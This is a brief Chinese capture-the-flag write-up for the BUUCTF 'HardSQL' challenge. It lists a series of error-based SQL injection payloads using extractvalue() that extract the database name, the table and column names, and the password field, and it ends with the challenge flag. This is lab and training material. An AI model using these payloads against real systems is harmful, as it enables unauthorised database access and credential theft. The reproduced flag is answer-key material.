[极客大挑战 2019]HardSQL 1

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档

---

题目

BUUCTF的[极客大挑战 2019]HardSQL 1

---

一、做题步骤

1.测试

1.测试后发现什么都不行
2.使用报错注入

extractvalue()函数：对XML文档进行查询的函数
updatexml()函数：是更新xml文档的函数

2.爆数据库

'^extractvalue(1,concat(0x7e,(select(database()))))%23

3.爆表名

'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(‘geek’))))%23

4.爆字段

'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘H4rDsq1’))))%23

5.爆数据

'^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23

'^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

6.获取flag

flag{a3d5b774-530a-427d-b087-a2b83088f6ce}